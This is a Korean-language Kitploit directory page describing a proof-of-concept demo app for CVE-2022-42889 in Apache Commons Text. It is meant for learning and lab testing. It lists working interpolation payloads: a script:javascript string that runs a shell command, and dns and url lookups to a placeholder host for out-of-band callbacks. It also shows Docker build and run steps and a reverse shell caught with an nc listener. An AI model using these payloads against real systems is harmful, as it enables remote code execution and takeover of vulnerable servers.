Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-42889-POC — CVE-2022-42889 취약점을 악용하는 방법을 보여주는 간단한 애플리케이션 | Kitploit
도구/GitHubGitHub/korteke/cve-2022-42889-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubkorteke/cve-2022-42889-poc

CVE-2022-42889-POC

CVE-2022-42889 취약점을 악용하는 방법을 보여주는 간단한 애플리케이션

저장소 보기
11713년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-42889-POC

CVE-2022-42889 취약점을 악용하는 방법을 보여주는 간단한 데모 애플리케이션입니다.
OOB(Out of Band) 서비스를 사용하여 dns 및 url 접두어를 시연합니다.

commons-text 보간을 위한 JavaDocs commons-text JavaDocs

보간 예제

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Rapid7 인용

이 취약점은 Log4Shell과 비교되어 왔습니다. 왜냐하면 이것은 관련 객체를 사용하는 다양한 소프트웨어 애플리케이션에 영향을 미칠 가능성이 있는 오픈 소스 라이브러리 수준의 취약점이기 때문입니다.
그러나 초기 분석 결과 이는 잘못된 비교임을 시사합니다. 취약점의 특성상 Log4Shell과 달리 애플리케이션이 Commons Text의 취약한 구성 요소를 사용하여 신뢰할 수 없는 잠재적으로 악의적인 입력을 처리하는 경우는 드물 것입니다.

사전 요구 사항

  • docker
  • java
  • maven

Docker Hub에서 이미지를 가져오는 경우 Java와 maven은 생략할 수 있습니다.

사용 방법

애플리케이션 빌드

root@kitploit:~
mvn clean package

Docker 이미지 빌드

root@kitploit:~
docker build -t cve-2022-42889-poc .

Docker 이미지 실행

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

애플리케이션에 접속하여 지침을 따릅니다

root@kitploit:~
open http://localhost:8081

취약점이 /tmp/ 디렉토리에 새 파일(/tmp/blop)을 생성하는지 확인합니다.

root@kitploit:~
➜  ~ docker exec -ti cve-2022-42889-poc /bin/ls /tmp

blop		 tomcat-docbase.8081.12439436974042217796
hsperfdata_root  tomcat.8081.2549096106233509364
➜  ~

리버스 셸. 로컬 머신에서 "nc" 실행

root@kitploit:~
➜  ~ nc -lv 4242
root@7cfcd6a39a61:/# whoami && uname -a
whoami && uname -a
root
Linux 7cfcd6a39a61 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 GNU/Linux
root@7cfcd6a39a61:/#

UI

네트워크 상호 작용 증명. 로컬 interactsh-client로 테스트했습니다.

추가 정보

  • NIST NVD
  • Rapid 7
도구 다운로드